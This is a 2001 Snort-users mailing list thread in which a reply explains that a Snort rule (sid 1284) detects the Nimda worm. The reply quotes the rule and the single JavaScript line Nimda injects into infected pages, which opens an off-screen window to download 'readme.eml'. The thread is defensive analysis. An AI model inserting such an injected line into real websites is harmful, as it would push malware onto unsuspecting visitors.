[Snort-users] uricontent misbehaving?

Tim Kramer kramert at ...3975...
Fri Nov 2 11:27:02 EST 2001


The "readme.eml" rule (in this case) was probably written
in response to the Nimda worm which infects web servers so
that they have an extra line of HMTL/JavaScript code at the
bottom of the web page.  The additional code causes a new
browser window to be opened will off the visible portion of
the desktop (location 6000,6000) and to download a file
called "readme.eml".  The actual code that gets added to the
webpage looks like (without the proper JavaScript tags):

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

The act of visiting the infected website causes an additional
HTTP request.  This also makes it easy to detect (via Snort) 
and/or easy to  block (via Squid).

Hope this helps,
Tim Kramer

On Fri, 2001-11-02 at 13:21, dan.ellis at ...3983... wrote:
> Hi,
> I'm not actually a snort user, but I'm trying to respond to a log I was
> sent:
> Date:01/11 18:43:59 Name:WEB-MISC readme.eml attempt
> Priority:8 Type:Attempted User Privilege Gain
> IP info: xxx.xxx.xxx.xxx:80 -> yyy.yyy.yyy.yyy:62689
> References: 1
> which apparently came from the rule:
> Alert tcp $EXTERNAL_NET 80 -> $HOME_NET any \
>     (msg:"WEB-MISC readme.eml attempt"; \
>     flags:A+; uricontent:"readme.eml"; nocase; \
>     classtype:attempted-user; sid:1284; rev:3; \
>     reference:url,www.cert.org/advisories/CA-2001-26.html;)
> (xxx... is our web server.)
> I'm not very familiar with snort, but from what I've just read in the
> documentation the 'uricontent' bit is supposed to match only on
> the URI of requests. However, this was a response packet from our
> web server. Of course, several of our pages contain the text "readme.eml",
> but I don't see how this rule could have triggered unless it was
> mistakenly matching as 'content' instead of 'uricontent'. Has 'uricontent'
> been known to misbehave in this way?
> Any information greatly appreaciated.
> Regards,
> Dan.
> --
> Dan Ellis, Software Engineer                              Sophos Anti-Virus
> email: dan.ellis at ...3983...                           http://www.sophos.com
> US Support: +1 888 SOPHOS 9                     UK Support: +44 1235 559933
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://www.geocrawler.com/redir-sf.php3?list=snort-users

More information about the Snort-users mailing list